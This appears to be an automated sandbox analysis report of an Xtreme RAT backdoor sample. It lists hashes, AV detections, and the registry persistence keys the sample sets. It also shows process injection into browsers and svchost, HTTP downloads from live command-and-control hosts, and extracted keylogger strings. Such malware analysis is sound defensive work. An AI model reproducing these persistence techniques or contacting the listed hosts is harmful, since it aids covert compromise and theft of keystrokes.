Analysis Date2013-12-16 04:14:54
MD51dfab158a350c13abd2e014fd658b932
SHA1e7cdf6221d9737703cadd64c8a162739bbc446ae

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: fc02cd8afdd8793685ea723efa4ed168 sha1: 48a4c9015abc334158995e67deb53a7bb778bff3 size: 34816
SectionDATA md5: abbf8c24e134a93f1d3ab1028a249254 sha1: 4de5081984f457329fcc363794543b14efd120be size: 512
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 97f471540f2f0c36d97a7e7b99200353 sha1: 61ee649f6bbb515b5e16db606e4be05d40a6cf93 size: 4096
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 2b44bd00623cc310df7d5458aa2dd5a3 sha1: 0119411a83671023e7bd8836d4b2185170b8ceab size: 512
Section.reloc md5: 9c9fe3de320d8875fa23badb1fcf2898 sha1: 2d0ce500f5b7ad4ffc01d4d734040e6d78eb0e82 size: 2560
Section.rsrc md5: da247aefa2da2e9df4a0e2e570673502 sha1: 492554b15947af748d12ac6a25ded8bd1735781e size: 115200
Timestamp1992-06-19 22:22:17
PEhasha235f36e4e8f3fc273d548b8735505e0133b47ba
AVclamavWIN.Trojan.Xtreme
AVavgBackDoor.Generic15.BMXP
AVmcafeeBackDoor-FAPG!1DFAB158A350
AVaviraBDS/Xtrat.46080125

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
RegistryHKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝
12/16/2013 1:59:44 AM
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates FileC:\WINDOWS\system32\InstallDir\host.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates FileC:\WINDOWS\system32\InstallDir\
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Processsvchost.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Processexplorer.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex((Mutex))PERSIST
Creates Mutex((Mutex))
Creates MutexXTREMEUPDATE

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex((Mutex))
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.webserver.com
Winsock DNStaker.servegame.com

Process
↳ C:\WINDOWS\system32\InstallDir\host.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
RegistryHKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝
12/16/2013 2:00:06 AM
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex((Mutex))PERSIST
Creates Mutex((Mutex))
Creates MutexXTREMEUPDATE

Process
↳ svchost.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates ProcessC:\WINDOWS\system32\InstallDir\host.exe
Creates Mutex((Mutex))PERSIST
Creates Mutex((Mutex))
Creates Mutex((Mutex))EXIT

Process
↳ explorer.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Network Details:

DNSwww.webserver.com
Type: A
82.98.86.174
DNStaker.servegame.com
Type: A
179.232.141.60
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1033 ➝ 179.232.141.60:1338
Flows TCP192.168.1.1:1034 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1035 ➝ 179.232.141.60:1338
Flows TCP192.168.1.1:1036 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1037 ➝ 179.232.141.60:1338

Raw Pcap
0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a6e 3a204b65 65702d41 6c697665   ...n: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 203c703e 596f7572 2062726f   .... <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 32392030 64306134 38366620   ....29 0d0a486f 
0x000000f0 (00240)   37333734 33613230 20202030 2e353037   73743a20   0.507
0x00000100 (00256)   3237292e 2e486f73 743a200a            27)..Host: .


Strings
 --- 
[Accept]
[Arrow Down]
[Arrow Left]
[Arrow Right]
[Arrow Up]
[Backspace]
[Back Tab]
BINDER
[Caps Lock]
.cfg
[CLIPBOARD] ---- 
[CLIPBOARD END]
CONFIG
[Context Menu]
[Copy]
.dat
%DEFAULTBROWSER%
[Delete]
DVCLAL
[End]
ENDSERVERBUFFER
[Esc]
.exe
[Execute]
explorer.exe
explorer.exe 
[F1]
[F10]
[F11]
[F12]
[F13]
[F14]
[F15]
[F16]
[F17]
[F18]
[F19]
[F2]
[F20]
[F21]
[F22]
[F23]
[F24]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F9]
FakeMessage
[Finish]
frgjbfdkbnfsdjbvofsjfrfre
frgkmjgtmklgtlrglt
.functions
[Help]
hgtrfsgfrsgfgregtregtr
[Home]
http://
ICON_STANDARD
[Insert]
InstalledServer
jiejwogfdjieovevodnvfnievn
jytjyegrsfvfbgfsdf
KeyDelBackspace
LastSize
[Left Alt]
[Left Ctrl]
Load
local
[Mail]
MAINICON
[Media]
\Microsoft\Windows\
[Mode Change]
Mutex
[Next Track]
%NOINJECT%
[Num Lock]
Numpad
[Numpad -]
[Numpad /]
[Numpad .]
[Numpad *]
[Numpad +]
open
PACKAGEINFO
[Page Down]
[Page Up]
[Pause]
[Play]
[Play / Pause]
[Previous Track]
[Print]
[Print Screen]
[Process]
[Reset]
restart
 restart
[Right Alt]
[Right Ctrl]
[Scrol Lock]
[Select]
[Separator]
ServerStarted
Shell
[Sleep]
SOFTWARE\
SOFTWARE\FakeMessage
Software\Microsoft\Active Setup\Installed Components\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\XtremeRAT
[Stop]
StubPath
svchost.exe
[Tab]
trhgtehgfsgrfgtrwegtre
[Volume Down]
[Volume Mute]
[Volume Up]
x.html
.xtr
XTREME
XTREMEBINDER
XtremeKeylogger
Xtreme RAT
XTREMEUPDATE
[Zoom]
>>>>>>>>>
;)/////
:(/+.///////
""++/+
(((++........++
)//./////
)+/.//////
$((+++++..+++
$(+../////////
$$$((((((
+/>>>>>>
$0(0,0004080<0D0H0L0l0p0t0
0"0*020:0B0J0R0Z0b0j0r0z0
020>0U0b0n0
:$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
%06789:;<&'()*+,-./12345
)+//////0[bm
0~'**)|vkoc
)//./////0Z
$$$((++++++1
1+1;1Q1b1g1l1v1
1$181H1N1]1c1{1
1?1X1q1
1fs\wm
1:Z+To/
2/>>>>>>
2$2-292q2}2
2*3/34393E3J3]3j3|3
2(++..////6//6
+29>>>>>
29>>>>
29>>>4cy
29>>>>:g
="=@=[=2><>F>P>Z>
2Functions
<2<?<H<S<
(+.////////3
3)3.343>3J3q3
3"3,3C3O3V3h3z3
;3<D<e<&=R=
3J3f3r3
=3l#<O
4)+.////////
424:4B4J4R4Z4b4j4r4z4
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4z4~4
4'4-4;4w4
4$4,474<4F4L4s4{4
4$4Y4`4
4=5w5}5
<(<4<B<j<w<}<
:#:4:E:V:g:u:
'?4=kW!{
 4K(X|
++55;;>;>/
++55;;/?
5'535A5n5v5~5
5"5*525:5B5J5R5Z5b5j5r5z5
5"5&5*5.52595J5[5l5}5
5+5J5V5\5h5p5}5
5#6/666H6_6k6s6}6
5%6G6F7N7V7
++5;;>>>>>9/
(//.//6///.`
(+/.///6////
(+++...6///////..+)
$((++.......6/..+ 
$)+..///////6
++++.6///////////..)(
#$(+++....6/6////.+)
6"6*626:6B6J6R6Z6b6j6r6z6
6'686I6Z6k6|6
686B6i6n6s6
=.>6>>>W>
<!<*<7<
7//.6///]bbd
7&777H7Y7j7{7
7-7>7k7q7|7
7)7h7~7
7>>eknpp
7i	HF,F}
%(+++.//////////8=
8%868G8X8i8z8
8 8&808<8D8S8X8b8q8}8
8 8*848>8I8N8
8?8K8T8
8:9@9q9|9
8//..\deiiiiir
>8d,?(M4
8g	$`jv
!"/;;>>>>>>>9/ 
9#:1:<:S:_:f:q:
9$959F9W9h9y9
9"9?9E9R9e9r9x9
9/9;9i9
+9>>>>>B
9fnppttttt
*^>9X%
advapi32.dll
:a>k>	?
=<=A=K=U=_=q=
b7HOPPN;6U
C+9>>>>>
CallNextHookEx
:cA_z(
CharLowerW
CharNextW
CharUpperW
CloseClipboard
CloseHandle
=C=O=\=n=
CopyFileW
CreateDirectoryW
CreateFileW
CreateMutexW
CreateProcessW
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CreateWindowExW
D"99;>>>>>>HJJE+
d{{{AQe#
dddiiir
,////.^ddhii
ddiiiipppp
DefWindowProcA
DeleteFileW
DeleteUrlCacheEntryW
dhqqqqsssssususuuuususssqqqqqppiie~
DispatchMessageA
,_dppppqqqqssssssssssssrqqqjjjhhphph
ExitProcess
???FFFIGFFF???>
?FFHHHHHKHHHHHF?
:fh{k 
FindExecutableW
FindFirstFileW
FindResourceW
FreeLibrary
FreeResource
FtpPutFileW
FtpSetCurrentDirectoryW
g8+I`6
G9;>&djn
geippppqpqqqqu
GetClipboardData
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDateFormatW
GetDesktopWindow
GetFileAttributesW
GetFileSize
GetForegroundWindow
GetKeyboardLayout
GetKeyboardState
GetKeyState
GetLastError
GetLocalTime
GetModuleFileNameExW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryW
GetSystemTime
GetTempPathW
GetThreadContext
GetTimeFormatW
GetWindowRect
GetWindowsDirectoryW
GetWindowTextW
GetWindowThreadProcessId
GlobalLock
GlobalSize
GlobalUnlock
>;>G>S>[>c>p>x>
;#;-;g;t;
HeapAlloc
HeapFree
HeapReAlloc
Hf;4Cu
hqssuuuu{v{{{
;H;U;z;
HUZ+tP3Y/3Z
?>????????>>>I
.idata
IHDR_x
ILLMMMNNOMMMLH
InternetCloseHandle
InternetConnectW
InternetOpenW
>.>=>I>N>Z>f>r>x>
IsWow64Process
j38O~m
JC84*$
JhQ@iWa
K 2!RN
kernel32.dll
Kernel32.dll
KKLLKK
KMMNRRRRRROMML
kpqqsssuuuvvvvvvvvvvvuussssqqqpphq
kptttvvvvvvvvvvtttpppnq
ksuuv{{{{
KWindows
:(:@:?=K=X=j=r=z=
-K/Zrz
l6k1<x
LFHHLLMMMLLLHHHM
LLQQQQQQLL
LoadLibraryA
LoadResource
LocalAlloc
LocalFileTimeToFileTime
LockResource
lstrlenW
L,zJ`oiCy{0N@
MapVirtualKeyW
MessageBoxW
mnpppp
MultiByteToWideChar
n1BX80
N6ofVF.X
NJ$>CUP#
NORRSSSSRRRO
}nRjA.H
ntdll.dll
NtSetInformationProcess
NtUnmapViewOfSection
ntvvwvxx
nuv{{{
oleaut32.dll
OpenClipboard
OpenProcess
O	veBP'
_oz	sX
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PeekMessageA
{$P(& M
Portions Copyright (c) 1999,2003 Avenger by NhT
PostMessageA
P.reloc
Process32FirstW
Process32NextW
P.rsrc
PSAPI.dll
pSS	xS
:$:p:v:
=,>^>*?q?
q6q4_!e
>@?=QN59984
QQQQQQQSVW
QQQQQQS
QSSSVVSUSQ
R1Y1f1
RaiseException
.rdata
ReadFile
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassW
RegisterWindowMessageW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ResumeThread
	{:r=J
RtlUnwind
/s#10y'
SendMessageA
SetClipboardViewer
SetEndOfFile
SetErrorMode
SetFileAttributesW
SetFilePointer
SetFileTime
SetProcessDEPPolicy
SetThreadContext
SetThreadPriority
SetWindowsHookExW
SHDeleteKeyW
shell32.dll
Shell32.dll
ShellExecuteW
SHGetMalloc
SHGetPathFromIDListW
SHGetSpecialFolderLocation
shlwapi.dll
ShowWindow
SizeofResource
(S#u'v
SUWWWXWVVS
SWWYYWWT
SysAllocStringLen
SysFreeString
SysInit
SysReAllocStringLen
System
SystemTimeToFileTime
Sz6`ev
;.;`;t;
TerminateProcess
TerminateThread
This program must be run under Win32
TKMLJS
TlsGetValue
TlsSetValue
ToUnicodeEx
TranslateMessage
UnhandledExceptionFilter
UnhookWindowsHookEx
UnitConfigs
UnitCryptString
UnitGetServer
UnitInjectProcess
UnitInjectServer
UnitInstallServer
UnitKeylogger
URLDownloadToFileW
urlmon.dll
user32.dll
UTypes
V3CFIICFBA2R
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtectEx
{{{vsw
{{{vuuqk
{{{vuuussqh
{{{{vvvvvuusssqqih
WaitForSingleObject
WideCharToMultiByte
WideString
wininet.dll
&%Wkkg_
=)wpa.s
WriteFile
WriteProcessMemory
WVXEGHF@A
;W]XV.
`WXYYYYXWa
XRSSVVWWTSRY
xwvvts
